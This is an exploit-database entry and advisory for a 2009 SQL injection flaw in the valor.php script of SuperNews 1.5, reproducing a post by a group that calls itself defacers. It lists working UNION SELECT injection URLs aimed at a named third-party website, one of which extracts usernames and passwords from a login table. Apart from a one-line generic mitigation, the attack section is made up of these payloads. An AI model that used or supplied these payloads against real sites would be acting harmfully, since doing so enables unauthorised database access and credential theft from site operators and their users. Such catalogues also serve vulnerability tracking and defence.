SuperNews 1.5 SQL Injection in valor.php

vendor:

SuperNews

by:

p3s0k!

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: SuperNews

Affected Version From: 1.5

Affected Version To: 1.5

Patch Exists: NO

Related CWE: N/A

CPE: a:supernews:supernews:1.5

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

SuperNews 1.5 SQL Injection in valor.php

SuperNews 1.5 is vulnerable to SQL Injection in the 'valor.php' script. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information. An example of the vulnerable URL is http://www.avhsj.com.br/noticias/valor.php?noticia=[SQL-Injection]. A live demo of the exploit can be found at http://www.avhsj.com.br/noticias/valor.php?noticia=-1+union+select+0,1,2,database(),4,5-- and http://www.avhsj.com.br/noticias/valor.php?noticia=-1+union+select+0,1,2,user,pass,5+from+login--.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated before being used in any SQL queries.

Source

Exploit-DB raw data:

#############################################################
SuperNews 1.5 SQL Injection in valor.php
#############################################################


###################################################
#[~] Author :  p3s0k!
#[~] Terminal Hacker Team
###################################################

Example:
http://www.avhsj.com.br/noticias/valor.php?noticia=[SQL-Injection]


LiveDEMO:

http://www.avhsj.com.br/noticias/valor.php?noticia=-1+union+select+0,1,2,database(),4,5--
http://www.avhsj.com.br/noticias/valor.php?noticia=-1+union+select+0,1,2,user,pass,5+from+login--



##############################
#[!] Terminal Hacker Defacers
#[!] www.TerminalHacker.es
##############################

# milw0rm.com [2009-03-23]